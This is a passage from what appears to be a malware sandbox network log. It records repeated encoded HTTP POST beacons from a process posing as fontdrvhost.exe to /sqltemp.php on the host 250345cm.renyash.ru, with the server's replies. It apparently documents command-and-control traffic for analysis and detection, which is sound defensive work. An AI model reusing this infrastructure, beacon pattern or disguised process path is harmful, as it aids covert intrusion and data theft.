                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ORDMGz334LN0r2K91e7pK9Oh6e7YLfwxrvHH5qFp8XudCVJ6w2XUDfTR4eMPy2WsCHuZqYRE7Fz44N%2FHUYnNrwDGjo27n7NtQYdRY4Q3%2BxJ6LtWaTBPKw1yBJzc%2Btwzm%2F%2BP9TS57"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff33c98e41c1-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2351&min_rtt=1724&rtt_var=1900&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1307&delivery_rate=216585&cwnd=204&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            132192.168.2.450145104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:40.795845032 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:41.152379990 CET1012OUTData Raw: 56 50 5f 5c 51 5f 54 50 58 56 52 59 56 50 59 57 5b 5f 54 5f 55 5d 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VP_\Q_TPXVRYVPYW[_T_U]P[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.$/* !$>?,:-T ><[(9')'7\*+-C&?4.&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:41.250391006 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:41.526192904 CET802INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:41 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LXvLbGT47N1TfCWo1NM6Vxpt1AaBK6stHrgVuFF1Mq7lugjmOO2FNNVFz9RVk6Ob8KSH3q5wY0vNYLEqwJz%2FJDL18XDRApkWNXMmCL3852HQI9q2ZwDJJqm%2BaY1EQrVvQvnS1zQd"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff388c94c34b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4186&min_rtt=1663&rtt_var=5670&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=66819&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            133192.168.2.450146104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:41.653513908 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:42.011959076 CET1012OUTData Raw: 56 5f 5f 57 54 51 54 51 58 56 52 59 56 5e 59 5f 5b 58 54 51 55 5d 50 5f 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: V__WTQTQXVRYV^Y_[XTQU]P_Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.[35Z7?9\'=4.:" $Z?)$)>, 2#+)C%,(9:&Y.,Y-
                                                                                                                                                                                            Jan 1, 2025 14:53:42.096760035 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:42.272258043 CET807INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:42 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BjBCH76NXmFH%2BKDeZehW6DVUy2JSMRIG8ssg7MtSr07inuRCmQeAG5gKx%2BcXY9aBqqGPuelTA8UoxPz4zHn3X6NFNKOWlA4Y1vILhx8H%2FjLEcYqSBN8qk8bgc6KHBVIUPGqESUhM"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff3ddaf80f71-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2376&min_rtt=1490&rtt_var=2331&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=170143&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            134192.168.2.450147104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:42.402839899 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:42.761868954 CET1012OUTData Raw: 56 50 5f 54 54 5a 54 51 58 56 52 59 56 5a 59 51 5b 5d 54 5a 55 55 50 5c 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: VP_TTZTQXVRYVZYQ[]TZUUP\Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._3/=7?3>3D.::4$<=(Y42$+*&,;T-*&Y.,Y--
                                                                                                                                                                                            Jan 1, 2025 14:53:42.880352020 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:43.039623022 CET804INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:42 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ykf7w1jrM%2FuvAH6Vvz1J38SzbpHsmFN73P8aZ1bD14vF047KmGFH2geYprg%2FQc%2FOW3qN8XqqEAWudEbVnXh8EcadHIgow1kJzBtFOIseKUqLyfjIg3q4ZDkiIHzUEkRDbGavdnU2"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff42ab33429b-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4953&min_rtt=1669&rtt_var=7194&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=52251&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            135192.168.2.450148104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:43.167712927 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:43.511816025 CET1012OUTData Raw: 53 54 5a 54 54 51 54 5c 58 56 52 59 56 5b 59 52 5b 5c 54 5d 55 5e 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: STZTTQT\XVRYV[YR[\T]U^P[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.36 /-]3?/7=;?* =. 7Y+5E%<$-:&Y.,Y-)
                                                                                                                                                                                            Jan 1, 2025 14:53:43.654556036 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:43.822580099 CET811INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:43 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v5QPWP6bKflU1%2Fmm330rkjlLjmfBumv2m06N7Np%2FxodWHX%2BhrMhhqsnAbSQceqT1O5P1puzQFrZXcy4fBopvDRqq%2FX84wY82pppYxK0ir55FDJA0%2F6E4aLRyUW1QU%2BY18TBtcw88"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff478e9f8cbf-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3274&min_rtt=1975&rtt_var=3340&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=118008&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            136192.168.2.450149104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:43.950927973 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:44.309601068 CET1012OUTData Raw: 53 52 5f 51 54 51 54 5d 58 56 52 59 56 5d 59 56 5b 58 54 59 55 5a 50 5d 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SR_QTQT]XVRYV]YV[XTYUZP]Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.Z'& .$>$82 X((>Y42+(>&?:&Y.,Y-1
                                                                                                                                                                                            Jan 1, 2025 14:53:44.423270941 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:44.668416977 CET808INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:44 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nUQC8KvQzNWhIyfiObQFhwAd0bhwEjX0UFXAhBMF1pdu9LS51kuudkQoJjkU8O2%2Bok4C6kc%2B1XywJw6wz5F9rohz%2BT4PG7JvXhITNY2UWOw2VF0%2Bbo4S17wqJo%2B9jyv2E7WVftND"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff4c59d9422d-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4744&min_rtt=1637&rtt_var=6829&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=55098&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            137192.168.2.450150104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:44.796705961 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1008
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            138192.168.2.450151104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:44.821763992 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1852
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:45.173615932 CET1852OUTData Raw: 53 53 5f 52 54 5d 54 5d 58 56 52 59 56 5c 59 53 5b 5c 54 51 55 58 50 59 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SS_RT]T]XVRYV\YS[\TQUXPYZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S.&,%]7<"0#A/)9 '(97W*<Z4!4<]"2<-&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:53:45.275059938 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:45.529277086 CET958INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:45 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=guh5ntGna0YB97rVb0u%2FTDHD64RhePkBPZwyXGytY2Wgwsk2ycUCl8oNPk7UhMI1g5Z9l9foY%2Bid9u9jNhdXCO%2F43UlKQ0a4yYlZvwEH0MepOO%2BsLaAJkedZfteGODR%2FM7iDhvwg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff51acbd1871-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3010&min_rtt=1506&rtt_var=3572&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2171&delivery_rate=107844&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 39 38 0d 0a 00 1f 25 12 29 2e 3d 0f 25 21 33 02 3c 13 3c 0f 27 2d 2e 59 3c 01 39 05 24 2e 02 00 29 29 24 00 36 5a 32 01 32 5e 2f 06 20 5b 2f 11 30 24 2b 59 05 1c 20 0b 21 3f 3c 13 3d 04 33 5c 31 59 36 00 33 00 06 14 2b 01 3c 56 23 28 33 1d 30 3e 27 04 2a 39 34 54 33 2c 3f 5c 3a 3c 2d 10 27 3a 2c 54 00 11 26 1e 27 57 28 15 22 37 0a 1f 36 08 29 13 25 34 2d 0a 25 02 02 0d 23 07 39 01 26 32 06 06 22 0d 2a 5a 31 05 3d 11 20 2d 37 18 3d 04 25 53 20 02 2d 48 05 3f 57 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 98%).=%!3<<'-.Y<9$.))$6Z22^/ [/0$+Y !?<=3\1Y63+<V#(30>'*94T3,?\:<-':,T&'W("76)%4-%#9&2"*Z1= -7=%S -H?WS0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            139192.168.2.450152104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:44.937788010 CET319OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                            Jan 1, 2025 14:53:45.297107935 CET1012OUTData Raw: 53 54 5f 50 54 51 51 57 58 56 52 59 56 5c 59 5f 5b 5d 54 5d 55 5e 50 5b 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: ST_PTQQWXVRYV\Y_[]T]U^P[Z_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S._'<5Y7<='.4,-V =0?;*(#1 *;)&79:&Y.,Y-5
                                                                                                                                                                                            Jan 1, 2025 14:53:45.385082960 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:45.569782019 CET815INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:45 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r%2FzCymVj0ly86t9citZb4klNqo7FZKE7cFfg%2BLty0FPNgmMoRbOvsNguT%2BOHxhwGG%2F%2Bby%2F7jkEQKPs%2BkCIqtoFkFdhCigCglSHmpwo8PH%2BcmgqtSM8YS3mOyKaHUxfWz1WmV6mNG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                            CF-RAY: 8fb2ff526ea10f6f-EWR
                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2092&min_rtt=1500&rtt_var=1748&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1331&delivery_rate=233899&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                                            Data Raw: 34 0d 0a 32 57 5c 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 42W\X0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            140192.168.2.450153104.21.38.84806324C:\Drivers\fontdrvhost.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            Jan 1, 2025 14:53:45.702769041 CET295OUTPOST /sqltemp.php HTTP/1.1
                                                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                                                                                            Host: 250345cm.renyash.ru
                                                                                                                                                                                            Content-Length: 1012
                                                                                                                                                                                            Expect: 100-continue
                                                                                                                                                                                            Jan 1, 2025 14:53:46.058976889 CET1012OUTData Raw: 53 52 5f 50 51 58 51 56 58 56 52 59 56 5d 59 53 5b 58 54 5e 55 5d 50 54 5a 5f 59 50 54 58 55 5f 5c 5d 52 58 58 59 5a 53 5d 5c 51 53 59 52 54 5e 56 54 5f 43 5a 5a 56 5c 54 5c 54 5a 5e 5a 57 5e 5f 5b 5e 5d 53 5d 56 51 5e 5a 59 5e 5a 5c 47 5d 54 5b
                                                                                                                                                                                            Data Ascii: SR_PQXQVXVRYV]YS[XT^U]PTZ_YPTXU_\]RXXYZS]\QSYRT^VT_CZZV\T\TZ^ZW^_[^]S]VQ^ZY^Z\G]T[VVZ]U_VYRSZYVVSZ\V\SGY^UZZYSFX]CQV][YP]]]Z[QYS_P]][_[_XXPRT__TZ^TBPWT_B^B^VYZWDZ[FPZP\U]P^P[T\\SZ]X^]S-&,:#1Y'A/:4><<#U)<\ +<;%A&,-*&Y.,Y-1
                                                                                                                                                                                            Jan 1, 2025 14:53:46.160018921 CET25INHTTP/1.1 100 Continue
                                                                                                                                                                                            Jan 1, 2025 14:53:46.420586109 CET811INHTTP/1.1 200 OK
                                                                                                                                                                                            Date: Wed, 01 Jan 2025 13:53:46 GMT
                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oBMCE%2BfaWOfHHPjPUfU1Mk2Mbxu%2FHIdO9kWMAAyF%2B%2FITLYk42D60yoENkGJdD%2FgnkFwaCbOsKgWZiW%2FM9Xw2A83EKBCDMOriSLeFNjBpthjSulZehA2oOTq4YABenoLiwfIBeySJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                            Server: cloudflare
